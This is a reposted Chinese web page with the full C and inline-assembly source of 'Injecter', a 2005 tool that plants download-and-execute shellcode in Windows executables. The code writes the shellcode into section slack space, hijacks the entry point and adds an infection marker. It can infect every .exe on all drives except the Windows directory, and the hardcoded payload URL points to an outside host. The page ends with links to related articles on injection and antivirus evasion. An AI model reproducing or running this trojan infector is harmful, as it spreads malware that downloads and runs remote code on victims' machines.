pe代码注射
来源:互联网 发布:湖北广电网络客服 编辑:程序博客网 时间:2024/04/29 17:25
/*
思路:把一个download && execute shellcode改装注射到pe文件的空闲字节处
enjoy it!
*/
#include
#include
//#define CODESIZE 439
typedef struct _DISKLIST //用于保存磁盘驱动器信息的链表
{
_DISKLIST *next;
char RootPath[6];
}DISKLIST,*PDISKLIST;
unsigned char *injectcode;
DWORD CodeSize;
unsigned char code_dll_header[]=
"/xE9/xF4/x00/x00/x00/x5A/xB8/x0C/xF0/xFD/x7F/x8B/x00/x8B/x70/x1C"
"/xAD/x8B/x40/x08/x8B/xD8/x8B/x73/x3C/x03/xF3/x8B/x76/x78/x03/xF3"
"/x8B/x7E/x20/x03/xFB/x8B/x4E/x14/x33/xED/x56/x57/x51/x8B/x3F/x03"
"/xFB/x8B/xF2/x6A/x0E/x59/xF3/xA6/x74/x08/x59/x5F/x83/xC7/x04/x45"
"/xE2/xE9/x59/x5F/x5E/x8B/xCD/x8B/x46/x24/x03/xC3/xD1/xE1/x03/xC1"
"/x33/xC9/x66/x8B/x08/x8B/x46/x1C/x03/xC3/xC1/xE1/x02/x03/xC1/x8B"
"/x00/x03/xC3/x8B/xFA/x8B/xF7/x83/xC6/x0E/x8B/xD0/x6A/x06/x59/xE8"
"/x70/x00/x00/x00/x83/xC6/x0D/x52/x56/xFF/x57/xFC/x5A/x8B/xD8/x6A"
"/x01/x59/xE8/x5D/x00/x00/x00/x83/xC6/x13/x56/x46/x80/x3E/x80/x75"
"/xFA/x80/x36/x80/x5E/x83/xEC/x20/x8B/xDC/x6A/x20/x53/xFF/x57/xE4"
"/xC7/x04/x18/x5C/x72/x74/x2E/xC7/x44/x18/x04/x64/x6C/x6C/x00/x90"
"/x81/xEC/x40/x01/x00/x00/x54/x53/xFF/x57/xF0/x83/xF8/x00/x7E/x08"
"/x53/xFF/x57/xEC/x85/xC0/x74/x16/x33/xC0/x50/x50/x53/x56/x50/xFF"
"/x57/xFC/x85/xC0/x75/x08/x50/x83/xC6/x2B/x56/xFF/x57/xE8/xE9/xA2"
"/xA2/xA2/xA2/x90/x33/xC0/xAC/x85/xC0/x75/xF9/x51/x52/x56/x53/xFF"
"/xD2/x5A/x59/xAB/xE2/xEE/x33/xC0/xC3/xE8/x07/xFF/xFF/xFF/x47/x65"
"/x74/x50/x72/x6F/x63/x41/x64/x64/x72/x65/x73/x73/x00/x47/x65/x74"
"/x53/x79/x73/x74/x65/x6D/x44/x69/x72/x65/x63/x74/x6F/x72/x79/x41"
"/x00/x57/x69/x6E/x45/x78/x65/x63/x00/x44/x65/x6C/x65/x74/x65/x46"
"/x69/x6C/x65/x41/x00/x46/x69/x6E/x64/x46/x69/x72/x73/x74/x46/x69"
"/x6C/x65/x41/x00/x45/x78/x69/x74/x50/x72/x6F/x63/x65/x73/x73/x00"
"/x4C/x6F/x61/x64/x4C/x69/x62/x72/x61/x72/x79/x41/x00/x75/x72/x6C"
"/x6D/x6F/x6E/x00/x55/x52/x4C/x44/x6F/x77/x6E/x6C/x6F/x61/x64/x54"
"/x6F/x46/x69/x6C/x65/x41/x00";
unsigned char code_exe_header[]=
"/xE9/xF4/x00/x00/x00/x5A/xB8/x0C/xF0/xFD/x7F/x8B/x00/x8B/x70/x1C"
"/xAD/x8B/x40/x08/x8B/xD8/x8B/x73/x3C/x03/xF3/x8B/x76/x78/x03/xF3"
"/x8B/x7E/x20/x03/xFB/x8B/x4E/x14/x33/xED/x56/x57/x51/x8B/x3F/x03"
"/xFB/x8B/xF2/x6A/x0E/x59/xF3/xA6/x74/x08/x59/x5F/x83/xC7/x04/x45"
"/xE2/xE9/x59/x5F/x5E/x8B/xCD/x8B/x46/x24/x03/xC3/xD1/xE1/x03/xC1"
"/x33/xC9/x66/x8B/x08/x8B/x46/x1C/x03/xC3/xC1/xE1/x02/x03/xC1/x8B"
"/x00/x03/xC3/x8B/xFA/x8B/xF7/x83/xC6/x0E/x8B/xD0/x6A/x06/x59/xE8"
"/x70/x00/x00/x00/x83/xC6/x0D/x52/x56/xFF/x57/xFC/x5A/x8B/xD8/x6A"
"/x01/x59/xE8/x5D/x00/x00/x00/x83/xC6/x13/x56/x46/x80/x3E/x80/x75"
"/xFA/x80/x36/x80/x5E/x83/xEC/x20/x8B/xDC/x6A/x20/x53/xFF/x57/xE4"
"/xC7/x04/x18/x5C/x72/x74/x2E/xC7/x44/x18/x04/x65/x78/x65/x00/x90"
"/x81/xEC/x40/x01/x00/x00/x54/x53/xFF/x57/xF0/x83/xF8/x00/x7E/x08"
"/x53/xFF/x57/xEC/x85/xC0/x74/x16/x33/xC0/x50/x50/x53/x56/x50/xFF"
"/x57/xFC/x85/xC0/x75/x08/x50/x53/x90/x90/x90/xFF/x57/xE8/xE9/xA2"
"/xA2/xA2/xA2/x90/x33/xC0/xAC/x85/xC0/x75/xF9/x51/x52/x56/x53/xFF"
"/xD2/x5A/x59/xAB/xE2/xEE/x33/xC0/xC3/xE8/x07/xFF/xFF/xFF/x47/x65"
"/x74/x50/x72/x6F/x63/x41/x64/x64/x72/x65/x73/x73/x00/x47/x65/x74"
"/x53/x79/x73/x74/x65/x6D/x44/x69/x72/x65/x63/x74/x6F/x72/x79/x41"
"/x00/x57/x69/x6E/x45/x78/x65/x63/x00/x44/x65/x6C/x65/x74/x65/x46"
"/x69/x6C/x65/x41/x00/x46/x69/x6E/x64/x46/x69/x72/x73/x74/x46/x69"
"/x6C/x65/x41/x00/x45/x78/x69/x74/x50/x72/x6F/x63/x65/x73/x73/x00"
"/x4C/x6F/x61/x64/x4C/x69/x62/x72/x61/x72/x79/x41/x00/x75/x72/x6C"
"/x6D/x6F/x6E/x00/x55/x52/x4C/x44/x6F/x77/x6E/x6C/x6F/x61/x64/x54"
"/x6F/x46/x69/x6C/x65/x41/x00";
WIN32_FIND_DATA fd;
int ret;
DWORD dd;
PDISKLIST d_hlist=NULL,d_plist=NULL,d_padd=NULL;
char szWinDir[MAX_PATH]={0};
int WINAPI InjectCode(char *lpFileName)
{
HANDLE hFile,hMap;
DWORD dwSize=0,dwSizeHigh=0,dwAddr;
char buff[100]={0};
DWORD dd;
DWORD dwPeHdr,dwSecAddr,dwOldEntryPointer,dwNewEntryPointer;
hFile=CreateFile(lpFileName,
GENERIC_READ + GENERIC_WRITE,
FILE_SHARE_READ + FILE_SHARE_WRITE,
0,
OPEN_EXISTING,
0,
0);
if (hFile<=0)
{
return -1;
}
dwSize=GetFileSize(hFile,&dwSizeHigh);
if ((dwSize<=0)||(dwSizeHigh>0))
{
CloseHandle(hFile);
return -1;
}
//printf("size=%d/n",dwSize);
hMap=CreateFileMapping((HANDLE)hFile,
NULL,
PAGE_READWRITE,
0,
0,
NULL);
if (hMap<=0)
{
CloseHandle(hFile);
return -1;
}
dwAddr=(DWORD)MapViewOfFile(hMap,
FILE_MAP_WRITE,
0,
0,
0);
try
{
_asm
{
mov esi,dwAddr
cmp WORD ptr [esi],'ZM'
jne _injectnot
add esi,DWORD ptr [esi+3ch] ;指向PE_HEADER
cmp WORD ptr [esi],'EP'
jne _injectnot
mov dwPeHdr,esi
mov eax,[esi+28h]
mov dwOldEntryPointer,eax
cmp dword ptr [esi+8],'rude' ;判断感染标志
je _isinjected
mov ecx,DWORD ptr [esi+74h] ;得到directory的数目 NumberOfRvaAndSizes
imul ecx,ecx,8
lea eax,[ecx+esi+78h] ;data directory eax->节表起始地址
movzx ecx,word ptr [esi+6h] ;ecx->节数目
mov edi,eax
xor edx,edx
dec edx
_loop1:
inc edx
imul eax,edx,28h
mov ebx,dword ptr [edi+eax+10h] ;SizeOfRawData 28h->节表大小
sub ebx,[edi+eax+8h] ;SizeOfRawData-VirtualSize 剩余空间
cmp ebx,CodeSize
jg _writecode ;写入代码
mov dd,ebx
push ecx
push edx
}
//printf("%d/n",dd);
_asm
{
pop edx
pop ecx
loop _loop1
jmp _injectnot
_writecode:
add edi,eax
mov dwSecAddr,edi
mov ebx,[edi+0ch] ;VirtualAddress
add ebx,[edi+8h] ;ebx->代码在内存中地址
mov dwNewEntryPointer,ebx
add ebx,0deh ;ebx->jmp EntryPoint指令地址
sub ebx,dwOldEntryPointer
mov eax,0FFFFFFFFh
sub eax,ebx
sub eax,4
mov esi,injectcode ;更新跳转指令码
add esi,0dfh
mov dword ptr [esi],eax
mov ebx,[edi+14h] ;PointerToRawData
add ebx,[edi+8h] ;ebx->代码写入地址
add ebx,dwAddr
mov edi,ebx
mov ecx,CodeSize
mov esi,injectcode
rep movsb ;写入代码
mov edi,dwSecAddr
mov dword ptr [edi+24h],0E0000020h ;节属性
mov esi,dwPeHdr
mov dword ptr [esi+8h],'rude' ;写入感染标志
mov eax,dwNewEntryPointer
mov dword ptr [esi+28h],eax ;更新EntryPoint
}
UnmapViewOfFile((LPCVOID)dwAddr);
CloseHandle(hMap);
CloseHandle(hFile);
return 0;
_asm
{
_injectnot:
_exit:
}
UnmapViewOfFile((LPCVOID)dwAddr);
CloseHandle(hMap);
CloseHandle(hFile);
return -1;
_asm
{
_isinjected:
}
UnmapViewOfFile((LPCVOID)dwAddr);
CloseHandle(hMap);
CloseHandle(hFile);
return -2;
} //异常捕获
catch (...)
{
printf("error!/n");
}
}
int WINAPI ckDirS(char *szDir)
{
HANDLE hSearch;
char szDirectory[MAX_PATH];
char szDirTmp[MAX_PATH];
dd=strlen(szWinDir);
if (memcmp(strupr(szDir),strupr(szWinDir),dd)==0) //跳过windows目录
{
return 0;
}
memset(&fd,0,sizeof(WIN32_FIND_DATA));
strncpy(szDirectory,szDir,MAX_PATH);
strcat(szDirectory,"*.*");
hSearch=FindFirstFile((LPCTSTR)szDirectory,&fd);
if (hSearch==INVALID_HANDLE_VALUE)
{
return -1;
}
do
{
if (fd.cFileName[0]!='.')
{
if(fd.dwFileAttributes&FILE_ATTRIBUTE_DIRECTORY) //目录
{
memset(szDirTmp,0,MAX_PATH);
strcat(szDirTmp,szDir);
strcat(szDirTmp,fd.cFileName);
strcat(szDirTmp,"//");
ckDirS(szDirTmp);
}
else
{
dd=strlen(fd.cFileName);
if ((fd.cFileName[dd-4]=='.')&&
(fd.cFileName[dd-3]=='e')&&
(fd.cFileName[dd-2]=='x')&&
(fd.cFileName[dd-1]=='e'))
{
memset(szDirTmp,0,MAX_PATH);
strcat(szDirTmp,szDir);
strcat(szDirTmp,fd.cFileName);
printf("inject:%s...",szDirTmp);
ret=InjectCode(szDirTmp);
if (ret==0)
{
printf("ok!/n");
}
else if (ret==-1)
{
printf("faild!/n");
}
else if (ret==-2)
{
printf("injected!/n");
}
}
}
}
}
while (FindNextFile(hSearch,&fd));
return 0;
}
int WINAPI ckDir(char *szDir)
{
HANDLE hSearch;
char szDirectory[MAX_PATH];
char szDirTmp[MAX_PATH];
memset(&fd,0,sizeof(WIN32_FIND_DATA));
strncpy(szDirectory,szDir,MAX_PATH);
strcat(szDirectory,"*.exe");
hSearch=FindFirstFile((LPCTSTR)szDirectory,&fd);
if (hSearch==INVALID_HANDLE_VALUE)
{
return -1;
}
do
{
if (fd.cFileName[0]!='.')
{
memset(szDirTmp,0,MAX_PATH);
strcat(szDirTmp,szDir);
strcat(szDirTmp,fd.cFileName);
printf("inject:%s...",szDirTmp);
ret=InjectCode(szDirTmp);
if (ret==0)
{
printf("ok!/n");
}
else if (ret==-1)
{
printf("faild!/n");
}
else if (ret==-2)
{
printf("injected!/n");
}
}
}
while (FindNextFile(hSearch,&fd));
return 0;
}
void start(void)
{
printf("/n");
printf("Injecter //--A Tool Can Inject The Download&&Execute Trojan To The PE File/n");
printf("Written By Ruder [2005/3],E-mail:cocoruder@163.com/n");
printf("Homepage:http://ruder.cdut.net,enjoy it!/n");
printf("Usage:/n");
printf("/tInjecter [order] [param]/n");
printf("/t[order]:/n");
printf("-all ---Inject all the exe file on disk except windows directory/n");
printf("-s ---under the directory,will scan the sub directory/n");
printf("-d ---under the directory,will not scan the sub directory/n");
printf("example:/n");
printf("/tInjecter -all/n");
printf("/tInjecter -s e:///n");
printf("/tInjecter -d d:///n");
printf("/n");
}
int WINAPI BrowDisk_SaveDiskInfoToList(char *lpChar)
{
//解码,添加磁盘名到链表
d_padd=(PDISKLIST)malloc(sizeof(_DISKLIST));
if (d_padd==NULL)
{
return -1;
}
memset(d_padd->RootPath,0,6);
strncpy(d_padd->RootPath,lpChar,strlen(lpChar));
d_padd->next=NULL;
if (d_hlist==NULL) //首链为空
{
d_hlist=d_padd;
d_plist=d_hlist;
}
else //添加至链表
{
d_plist->next=d_padd;
d_plist=d_padd;
}
return 0;
}
BOOL WINAPI BrowDisk_GetLogicalDriveList(VOID)
{
char BDBuffer[128];
char *lpChar;
memset(BDBuffer, 0x00, 128);
if (GetLogicalDriveStrings(128, BDBuffer) == 0 )
{
return FALSE;
}
for (lpChar=BDBuffer;*lpChar!=0x00;lpChar=lpChar+strlen(lpChar)+1)
{
BrowDisk_SaveDiskInfoToList(lpChar);
}
}
int WINAPI InjectAll(void)
{
PDISKLIST p1;
BrowDisk_GetLogicalDriveList();
p1=d_hlist;
if (p1==NULL)
{
return -1;
}
while (1)
{
ckDirS(p1->RootPath);
p1=p1->next;
if (p1==NULL)
{
break;
}
}
return 0;
}
int MakeInjectCode_Dll(char *szGetStr,char *szRunStr)
{
DWORD dd1,dd2,i;
dd1=strlen(szGetStr)+1;
dd2=strlen(szRunStr)+1;
CodeSize=sizeof(code_dll_header)+dd1+dd2-1;
injectcode=(unsigned char *)malloc(CodeSize);
if (injectcode==NULL)
{
return -1;
}
printf("%.8x/n",(DWORD)injectcode);
*(char *)(code_dll_header+0xD9)=(char)dd1;
i=sizeof(code_dll_header);
memcpy(injectcode,code_dll_header,i);
memcpy(injectcode+i-1,szGetStr,dd1);
i=i+dd1-1;
*(char *)(injectcode+i-1)=0x80;
memcpy(injectcode+i,szRunStr,dd2);
printf("%.8x/n",(DWORD)injectcode);
return 0;
}
int MakeInjectCode_Exe(char *szGetStr)
{
DWORD dd1,i;
dd1=strlen(szGetStr)+1;
CodeSize=sizeof(code_exe_header)+dd1-1;
injectcode=(unsigned char *)malloc(CodeSize);
if (injectcode==NULL)
{
return -1;
}
i=sizeof(code_exe_header);
memcpy(injectcode,code_exe_header,i);
memcpy(injectcode+i-1,szGetStr,dd1);
i=i+dd1-1;
*(char *)(injectcode+i-1)=0x80;
return 0;
}
void main(int argc,char *argv[])
{
int orderid;
// InjectCode("C://NTFSDOS//ntfschk.exe");
// return;
MakeInjectCode_Exe("http://www.xloading.com/ruder/calc.exe");
printf("SizeCode=%d/n",CodeSize);
printf("%d/n",InjectCode("d://a//pslist.exe"));
/*
if ((argc!=2)&&(argc!=3))
{
start();
return;
}
GetWindowsDirectory(szWinDir,MAX_PATH);
strcat(szWinDir,"//");
if (strcmp(argv[1],"-all")==0)
{
orderid=0;
InjectAll();
return;
}
if (strcmp(argv[1],"-s")==0)
{
orderid=1;
if (argc==2)
{
start();
return;
}
if (argv[2][strlen(argv[2])-1]!='//')
{
start();
return;
}
ckDirS(argv[2]);
return;
}
if (strcmp(argv[1],"-d")==0)
{
orderid=2;
if (argc==2)
{
start();
return;
}
if (argv[2][strlen(argv[2])-1]!='//')
{
start();
return;
}
ckDir(argv[2]);
return;
}
start();
*/
}
- pe代码注射
- 注射的一个完整代码
- 邪恶的RING0注射ShellCode脆弱的PE加载机制
- PE 操作代码集
- PE相关代码
- pe病毒代码段
- PE文件相关代码
- PE格式解析代码
- PE注入代码
- PE文件解析代码
- ascc+asp自动注射代码,可以猜后台
- ShellCode代码直接注射到远程进程内部
- PE格式文件的代码注入
- PE格式文件的代码注入
- PE格式文件的代码注入
- PE格式文件的代码注入
- PE格式文件的代码注入
- 向PE中注入代码
- 18个优秀的在线图片编辑服务网站
- ubuntu8下jdk详细安装和Java开发环境详细介绍(myeclipse+glassfish)
- MFC下通过分隔符分割CString
- [转载][南方周末] :当地防震局曾“辟谣”地震传言
- 20多个在线操作系统(webOS)一览
- pe代码注射
- Java Web Project 技巧备忘录
- Java编码规范(The Elements of Java Style)
- VC2008中使用GDI+ (1)
- 注射的一个完整代码
- 不定参数的应用
- Linux学习基础!
- 免杀跟过主动防御
- Unix系列shell程序编写(上)---